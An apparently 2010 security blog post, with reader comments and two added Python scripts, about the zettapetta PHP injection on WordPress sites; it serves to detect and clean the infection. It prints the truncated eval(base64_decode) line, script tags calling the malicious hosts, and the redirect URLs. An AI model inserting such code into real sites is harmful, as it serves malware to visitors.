Early this morning, we received reports that WordPress blogs were hacked on Linux shared hosting at DreamHost, as well as at other hosting companies. This is dangerous scareware: the injected code redirects your visitors to a fake anti-virus page that tries to install malware on their computers.
WordPress, Zencart and other PHP-based platforms were hit. Our earliest hacked-site report is from 5/6/2010 at 9:17am.
This malware was just detected and is not showing up on website malware scanners yet. We have notified sucuri.net of this latest infection so that they can update their malware detection systems immediately.
In no way am I bashing Network Solutions as a hosting company, but I had to share this video with you showing someone breaking into sites on their servers. This is why you need to take your website security seriously.
If you are hosting your WordPress blog at DreamHost or with another hosting company, please check your websites now to see whether they have been infected.
Warning: Do not open your website in a browser unless you have an up-to-date anti-virus program, your computer is virus free and you're on a secured network! The injected script runs in the visitor's browser, so it is safer to inspect the page source over FTP/SFTP or in your host's file manager than to load the page.
Here's some of Zettapetta's behavior:
- Your website is redirected to http://www1.firesavez5.com/?p=p52dcWpkbmmHjsbIo216h3de0KCf........ or http://www1.firesavez6.com/?p=p52dcWpkbG6HjsbIo...
- The redirect page is blank. Its source code contains the following: <h1>404 Not Found</h1>The page that you have requested could not be found.
- All of the .php files in your WordPress installation contain the following malicious code: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z..... (The visible part of the base64 string decodes to if(function_exists('ob_s, so the payload is ordinary PHP, encoded only to hide it from a casual search of the files.)
- Near the bottom of the source code of every .php file is the following script: <script src="http://zettapetta.com/js.php"></script> and <script src="http://www.indesignstudioinfo.com/ls.php"> .
- Your antivirus program blocks the installation of the threat: a www.firesavez5.com or www.firesaver6.com installer.


How to fix your hacked WordPress site infected with this malware... <<< Before you try this, please read the update below for a quick fix!!!
- Immediately remove the index.php file from the root of your WordPress installation. This stops your front page from serving the injected code to visitors while you clean up.
- Add a temporary index.html file to the root of your website that states your site is down for maintenance. (There's no reason to say your site is infected and scare people who haven't been affected.) If you don't know how to make your own, you can use our index maintenance page on your own site. Just unzip the file, upload it to your server and then rename it to index.html.
- Go into your File Manager or FTP client and find out the date and time your site was hacked. You can tell by looking at your .php files: they will most likely all have the same modification date and time. Write that timestamp down; it tells you which backups are safe to restore (only those taken before it) and where to look in your access logs. (To help spread awareness, please leave a comment below or email us this information so we can help track and spread security awareness to our readers.)
- Make sure you have a backup of your website taken before the timestamp you just found; a backup made after it contains the injected code too. You will need it handy to reinstall your website.
- Open your wp-content/plugins folder on your server and write down the names of all the plugins installed on your site.
- Make sure you have a backup of all your images and media. These are usually located in wp-content/uploads. You will need them to put your site back to normal.
- Delete your entire WordPress site from your server. If you have multiple sites on the same hosting account, you will have to do the same with them too! Don't just clean one: infected code left in any site on the account can reinfect the sites you have already fixed.
- Go to http://wordpress.org and download a fresh copy of the latest version of WordPress.
- Unzip the download and upload it to your website via file manager or FTP. If you have SFTP or FTPES capabilities, please use them. They encrypt the connection, so your password and your files cannot be read while they are in transit; plain FTP sends both in clear text.
- Upload your backed-up copy of wp-config.php to the root of your WordPress installation. This is the file that connects to your database so all your posts, pages, settings, etc. work again. Open it in a text editor first and make sure it does not contain the eval(base64_decode(...)) line or the script tags: it is a .php file, so a backup taken after the infection will carry them too.
- Upload your images and/or media back to the server. They are usually contained in your backed-up copy of wp-content/uploads, unless you chose to house your media in another folder. It contains all the images you've added to your posts from within wp-admin. Uploads should hold only media, so treat any .php file you find in there as planted by the attacker and leave it out. If you don't have a backup of this directory, you will have to re-upload all your images to your posts and pages. Yes, I know... nightmare!
- Upload your backed-up copy of your theme into the wp-content/themes directory. A theme is made of .php files and was injected like everything else, so use a copy from before the infection or download the theme fresh.
- Take the list of plugins you wrote down, go to http://wordpress.org, download fresh copies to your computer and upload them back to your website. Note: you may have to reactivate the plugins or redo their settings, but it sure beats losing everything.
- Try logging into your WordPress wp-admin section to see whether everything looks okay.
- Visit your home page and try clicking some links to see whether they work. If you get 404 errors when opening a post or page, go to wp-admin and update your permalinks. Here's how: click Settings > Permalinks > Save Changes. Whew, that was easy. Now go check whether your links work.
- Go to your server and make sure you have the correct permissions set. All directories/folders should be 755 at most. All files, including your .php files, images, HTML, etc., need to be set at 644 at most. Note: never set any directory to 777, even if a plugin recommends it; that lets every other account on a shared server write to it.
- Change all your passwords to strong ones: WordPress admin, FTP/SFTP, hosting control panel and database (if you change the database password, update it in wp-config.php). Don't reuse the same one anywhere!
- If you need help fixing your site, we can remove the malware and restore your WordPress for you. Contact us for more details.
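The steps above rely on spotting the injected line and its timestamp by hand. The script below is an added example (not code from WPSecurityLock, Sucuri or David Dede) that does the same check over a WordPress tree: it reports every .php file carrying the eval(base64_decode(...)) line or the zettapetta script tag, shows the first bytes of the decoded payload without executing it, returns the modification time the injected files share (the cut-off a usable backup must predate), and can strip both markers in place as a stopgap. The full reinstall listed above is still the safer route, because it also discards any files the attacker added. The sample tree it builds is constructed; the closing )); ?> of the injected line and the stand-in payload are assumptions, since the post shows only the prefix.

```python
"""
Find, time-stamp and strip the zettapetta injection described in this post.
Added example (not WPSecurityLock's, Sucuri's or David Dede's code).  The
sample tree is constructed; the closing `)); ?>` of the injected PHP line and
the stand-in payload are assumptions, since the post shows only the prefix.
"""
import base64
import os
import re
import tempfile
from collections import Counter

# Prefix as quoted in the post; the closing `)); ?>` is an assumption.
INJECTED_PHP = re.compile(
    r'<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>[ \t]*\r?\n?'
)
# The script tags the post reports near the bottom of every .php file.
INJECTED_SCRIPT = re.compile(
    r'[ \t]*<script src="http://(?:zettapetta\.com/js\.php'
    r'|www\.indesignstudioinfo\.com/ls\.php)">(?:</script>)?[ \t]*\r?\n?'
)


def read_file(path):
    """latin-1 round-trips every byte, so non-UTF-8 files survive a rewrite."""
    with open(path, encoding="latin-1") as fh:
        return fh.read()


def scan_file(path):
    """Finding for one .php file, or None if neither marker is present."""
    text = read_file(path)
    php = INJECTED_PHP.search(text)
    scripts = INJECTED_SCRIPT.findall(text)
    if not php and not scripts:
        return None
    head = ""
    if php:
        try:    # peek at the payload for the report; never eval it
            head = base64.b64decode(php.group(1))[:40].decode("latin-1")
        except ValueError:
            head = "<undecodable>"
    return {"path": path, "eval_injection": bool(php), "decoded_head": head,
            "script_tags": len(scripts), "mtime": int(os.path.getmtime(path))}


def scan_tree(root):
    """Every injected .php file under root, sorted by path."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                f = scan_file(os.path.join(dirpath, name))
                if f:
                    hits.append(f)
    return sorted(hits, key=lambda f: f["path"])


def infection_time(findings):
    """mtime shared by most injected files: the moment to look for in the
    access log, and the cut-off a usable backup must predate."""
    if not findings:
        return None
    return Counter(f["mtime"] for f in findings).most_common(1)[0][0]


def clean_file(path):
    """Strip the injected PHP line and script tags in place; True if changed."""
    text = read_file(path)
    cleaned = INJECTED_SCRIPT.sub("", INJECTED_PHP.sub("", text))
    if cleaned == text:
        return False
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(cleaned)
    return True


# Constructed stand-in; the real payload is not reproduced here.  The visible
# prefix in the post decodes to `if(function_exists('ob_s`, which this mimics.
STANDIN_PAYLOAD = base64.b64encode(
    b"if(function_exists('ob_start')){/* constructed stand-in */}").decode()
INFECTION_STAMP = 1273152000   # constructed epoch timestamp


def build_sample_tree():
    """Constructed WordPress-like tree: two injected files, one clean one."""
    root = tempfile.mkdtemp(prefix="wp-")
    injected = '<?php /**/ eval(base64_decode("%s")); ?>\n' % STANDIN_PAYLOAD
    tail = '<script src="http://zettapetta.com/js.php"></script>\n'
    files = {
        "index.php": (injected + "<?php require('./wp-blog-header.php'); ?>\n" + tail, INFECTION_STAMP),
        "wp-content/themes/t/footer.php": (injected + "</body></html>\n" + tail, INFECTION_STAMP),
        "wp-includes/untouched.php": ("<?php echo 'clean'; ?>\n", INFECTION_STAMP - 86400),
    }
    for rel, (body, stamp) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(body)
        os.utime(path, (stamp, stamp))
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    hits = scan_tree(root)
    for f in hits:
        print(f["path"], repr(f["decoded_head"]), f["script_tags"])
    print("infection mtime:", infection_time(hits))
    print("cleaned:", sum(clean_file(f["path"]) for f in hits))
```

Run it against the root of a real installation by replacing build_sample_tree() with the path to your site; compare infection_time() with your backup dates before restoring anything, and remember that clean_file() only removes these two markers, not files the attacker added.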
Now that you've recovered your website, be sure that you're using the latest version of WordPress. If you'd like detailed instructions on how to upgrade your WordPress installation, click here.
We need your help...
This new http://zettapetta.com/js.php malware was just discovered this morning, thanks to a report from Thomas. Please help spread awareness and come together as a community to have safe websites and browsing. Be sure to Tweet this post and add to your Facebook. If you find any information on this new issue, please leave a comment below so we can all help each other.
UPDATE 5/7/2010 at 12:15pm: David Dede of Sucuri.net has written some information about this attack as well as decoding the script.
Be first to know if anything has changed on your website or you have any malicious malware, get the Web Monitoring Service from Sucuri.net. You can sign-up with our discount affiliate link for only $7.99/month, click here.
UPDATE 5/7/2010 at 4:00pm: If your site is hosted at Go Daddy and you think it may have been compromised, please contact the Go Daddy Security Team here...
http://www.godaddy.com/securityissue
QUICK FIX - UPDATE 5/7/2010 at 5:00 pm: This latest attack seems to have a quick fix, according to David Dede. He has written instructions to fix your hacked WordPress site infected with zettapetta. CLICK HERE.
P.S. Thanks David! You Rock!
Go Daddy also responds to this attack - Read our latest post here.
Securely yours,
Regina Smola
Join us on May 19th for a WordPress Security Teleseminar!
You can still listen to our WordPress Security Teleseminar Replay with special guest Scott from Go Daddy, recorded on May 5, 2010. And sign up for our WordPress Security Teleseminar on May 19, 2010 at 9pm EST. Participate live from anywhere in the world. Click Here To Register Now!
My WordPress site at *GoDaddy* was hacked with this header injection today: timestamp May 7 00:53 MST
Hi Erik,
Thanks for reporting this. I have sent a message to Godaddy with your information. I appreciate you spreading awareness. If you need help fixing your site, just let us know.
If you think your site's been compromised and you host with GoDaddy.com, you can submit your information to our security team for review. The contact form can be found here: http://fwd4.me/Mrd
Alicia
I have just updated this post with a new video to watch someone breaking into a hosting server. Also, be sure to check for UPDATES right above my signature of anything new we find.
Regina, I don't understand. The video you posted above clearly shows someone hacking into **any shared hosting account** at Network Solutions **with no username or password needed**...
If this is true, then what difference does it make what I try to do to protect my site? I was hacked for the *third* time tonight and I'm certain I've taken every precaution and best practice several times over, spending days to do so, but it all won't matter a hill of beans if someone can just walk right in there due to a GoDaddy/NS/etc shared hosting vulnerability!
Right??
I just checked all the hacked websites we've fixed over the last month and none are attacked. This could possibly be a brute force attack. You should really use strong passwords. Generate a minimum of 14 characters and use different ones ASAP!
This morning one of my sites was hacked again. Same way as other WP sites.
What a pain.
Please send us an e-mail with your URL so we can do a manual scan and check the script on there.
David,
I cannot afford to keep my site hacked.
I replaced hacked files with backed up files.
I'm glad you had a backup.
As I also host a forum, I didn't want to remove everything and install it again, so what I did was remove the PHP line in question with Notepad++ from all the files I had just backed up, and upload everything to the server, overwriting each and every file.
I hope that'll do the trick as well?
Ramses,
I bet that took awhile. Glad you got rid of the code.
Be sure to check for any files that may have been added that shouldn't be there. Sometimes the malicious hackers add their own files to your site.
Well, it was nearly 6000 files. Luckily Notepad++ has an option to replace code in all files within a directory, so it was really just copying the code, telling Notepad++ to replace it with nothing, and letting it run for some minutes.
I'll have to take the time to see what has been added in the form of a file, which will be brutal considering I have over 6000 files up.
I have 12 different wordpress sites installed on DreamHost. None of mine are hacked. Makes me curious about what the issue is. Thanks for the information about it though.
Travis, I'm glad your sites are safe. I am noticing a lot of these infected websites have very weak passwords. Hmmm, could be a brute force attack.
Per advice given by a colleague whose blog was also hacked this morning, advice given by godaddy was also to change all passwords to something hard to breach, as you mention above. This information is a god-send!
Regina,
Not really.
I'm using an 11-character password.
Upper case, lower case, numbers, special characters. And of course it's not a dictionary word.
Result?
Hacked this morning.
Nope, it's not a brute force attack. That's for sure.
Yeah... I see the 1st comment mentions GoDaddy.
Have 2 sites both hosted there. 8:35 AM MST this morning. It hit one of them (HTML and minimal PHP)... the other one seemed okay. I have to go back and look ... the other one is just HTML if memory serves.
Hi Joe,
Sorry to hear about your site getting hacked. Make sure you let Go Daddy's Security Team know right away at http://www.godaddy.com/securityissue
My wordpress blog hosted with godaddy was hacked at 12:24AM this morning, May 7th. Thank you SO much for the steps above to fix it. Every single php file on the server has some nasty code on it. It appears as if none of the other files (css, js, html, etc), were touched. Can't tell yet if there were other files added. Doing a clean sweep as recommended.
I forgot to mention that I am NOT on the latest version of WordPress. I'm running a version that is a year or so old. So it's not just the latest upgrades that are affected. WordPress really might want to look into this. And quickly.
There's a quick fix to remove the malware from your WordPress website, thanks to David Dede. You can find it here. Also, a statement was just released by Go Daddy helping their customers - click here.
That quick fix from David is *awesome*. Unfortunately I had already done a manual removal of the code + overriding bad files and had just finished before I saw this. The really weird thing is, after all was said and done (took me 8 hours to fix today), I checked my permission settings on all folders and files that might have been insecure (index.php, .htaccess, .wp-config, etc, etc) and they were all rock-solid, at the highest, most secure settings, *before* this happened. This leads me to think that maybe it's an FTP issue, or somehow they are getting in through the hosts? Really wish I knew how to protect myself from this happening again, given how many people seem to have repeat occurrences. Off to change my passwords!
Thank you Regina and David Dede, you helped me to fix the problem finally.
My site is also hosted at godaddy, and you helped me solve this problem, not godaddy, they are not good at it.
Another WP site hacked this morning. May 08, 2010.
I was checking the access.log for the modification date of the hacked .php files. An example:
All files were last modified on March 30th at 12:06:
-rwxr-x--- 1 1112 1112 577 Mar 30 12:06 wp-rss.php
-rwxr-x--- 1 1112 1112 579 Mar 30 12:06 wp-rss2.php
-rwxr-x--- 1 1112 1112 11269 Mar 30 12:06 wp-settings.php
-rwxr-x--- 1 1112 1112 3970 Mar 30 12:06 wp-trackback.php
-rwxr-x--- 1 1112 1112 58404 Mar 30 12:06 xmlrpc.php
Let's have a look at the access.log:
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-login.php HTTP/1.1" 200 1891 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-admin/profile.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "GET /wp-admin/profile.php HTTP/1.1" 200 4922 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5683 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5833 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "GET /xmlrpc.php HTTP/1.1" 200 60814 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 9
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:56 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5765 "http://www.1112/" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
The above information is true for all of my hacked vhosts.
HTH
Thomas
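The excerpt above pairs the minute that `ls -l` shows on the injected files with the access-log lines from that minute. The script below is an added example, not the commenter's own code, that automates the pairing: it parses lines in the layout quoted, reconstructs per client the sequence of a POST to wp-login.php, a wp-admin page answered 200 (a 302 from a wp-admin page means the session was not authenticated, so the POST just before it was a failed login) and the POSTs to wp-admin pages that followed, and then checks whether those writes fall inside the minute of the listing. The log it runs on is the comment's excerpt plus one constructed benign request from a documentation address, and it assumes the listing and the log share a timezone.

```python
"""
Reconstruct the attacker's admin session from access-log lines in the layout
quoted in the comment above, and tie it to the `ls -l` minute on the injected
files.  Added example, not code from the comment's author.  The first log
line is constructed (documentation address); the remainder are the quoted
lines.  Assumes the listing and the log share a timezone.
"""
import re
from datetime import datetime, timedelta, timezone

# Field layout of the quoted lines: client, an id, ident, user, [time],
# "request", status, bytes, "referer", "user-agent", trailing duration.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

SAMPLE_LOG = """\
203.0.113.7 1112 - - [30/Mar/2010:11:58:02 +0200] "GET /2010/03/hello-world/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.6" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-login.php HTTP/1.1" 200 1891 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-admin/profile.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "GET /wp-admin/profile.php HTTP/1.1" 200 4922 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5683 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5833 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "GET /xmlrpc.php HTTP/1.1" 200 60814 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 9
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:56 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5765 "http://www.1112/" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
"""


def parse_line(line):
    """One log line to a dict, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    # Collapse the doubled slash in /wp-admin//options-permalink.php and
    # drop any query string so paths compare cleanly.
    rec["path"] = re.sub(r"/+", "/", rec["path"].split("?", 1)[0])
    return rec


def admin_write_sessions(lines):
    """Clients that logged in and then POSTed to wp-admin pages, in order.

    A GET to wp-admin answered 302 right after a login POST means the session
    was not authenticated (failed login); answered 200 it means it was.
    """
    state = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = state.setdefault(rec["client"], {
            "client": rec["client"], "ua": rec["ua"], "attempt_at": None,
            "login_at": None, "failed_logins": 0, "writes": [], "write_times": []})
        path, method, status = rec["path"], rec["method"], rec["status"]
        if method == "POST" and path == "/wp-login.php":
            s["attempt_at"] = rec["time"]
        elif path.startswith("/wp-admin/") and method == "GET" and s["attempt_at"]:
            if status == 302:
                s["failed_logins"] += 1
            elif status == 200 and s["login_at"] is None:
                s["login_at"] = s["attempt_at"]
        elif path.startswith("/wp-admin/") and method == "POST" and s["login_at"]:
            s["writes"].append(path)
            s["write_times"].append(rec["time"])
    found = [s for s in state.values() if s["writes"]]
    for s in found:
        s["first_write"], s["last_write"] = s["write_times"][0], s["write_times"][-1]
    return sorted(found, key=lambda s: s["login_at"])


def ls_minute(year, month, day, hour, minute, utc_offset_hours):
    """The minute an `ls -l` listing shows (e.g. Mar 30 12:06) as an aware
    datetime, in the timezone the log lines use."""
    return datetime(year, month, day, hour, minute,
                    tzinfo=timezone(timedelta(hours=utc_offset_hours)))


def wrote_during(session, minute):
    """True if any admin write fell inside [minute, minute + 60s)."""
    return any(minute <= t < minute + timedelta(seconds=60)
               for t in session["write_times"])


if __name__ == "__main__":
    listing = ls_minute(2010, 3, 30, 12, 6, 2)   # "Mar 30 12:06" from ls -l
    for s in admin_write_sessions(SAMPLE_LOG.splitlines()):
        print(s["client"], s["ua"], "failed logins:", s["failed_logins"],
              "writes:", len(s["writes"]), "in ls minute:", wrote_during(s, listing))
```

On a real server, feed it the whole access log with the same layout and the minute from the listing: a client that logs in after one or more failures and writes admin settings within seconds, from an unusual user agent, inside the minute the files changed is the session to report to your host and to block.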
I've tried the quick fix to solve the matter however it doesn't appear to work for me, I've removed all files on my site and re-uploaded refresh, patching my site as I don't have any backups however it there.
Could this be because someone else infected on the same server as me hasn't resolved it?
E-mailed my host but I just got a message stating this and that was out of date but my website was using the latest wordpress and mybb. :S
My WP blog (Bluehost) was hacked at 4:25 pm on May 6th. The blog itself looks fine but the admin site is messed up. I knew something weird was going on because I was getting fake Windows Security screens that said my computer was infected and it looked like it was doing a scan. I would immediately try to close the page and would get a "are you sure you want to navigate away from this page" box and the scan would appear to be continuing in the time that it took me to continue to try to shut it down. The fake pages would appear when I visited my blog, my blog admin page, and my own website.
The quick fix mentioned above isn't working for me.
Oh, and it's nice to see these hosting sites offering support. Bluehost's response? They sent an email this morning saying they had suspended my account due to "violation of terms of service".
Nice move Bluehost.
I was hit with this also (on dreamhost). But for me, it wasn't JUST wordpress files..it was pretty much all my php files for all my subdomains.
Also, under my main domain it added a ".files" folder that held a ton of html articles.
We had a wordpress blog linked into our joomla installation, it inserted the following code in index.php in the joomla directory. I deleted this and any file created in the last 2 days (there was wp-d23098sdoijasdfoiwj09uwef.php created yesterday) and when all this was done, the site is working. But now wordpress admin dashboard is corrupted. At least malware is gone. See more info on our other company blog:
http://eliteeservices.blogspot.com/2010/05/godaddy-network-solutions-dreamhost.html
Hi Joe,
Try cleaning your browser cookies and cache and it should look normal again.
I believe my site has been compromised. Can you help me fix this?
http://www.wpsecuritylock.com/services/wordpress-malware-removal-and-restoration/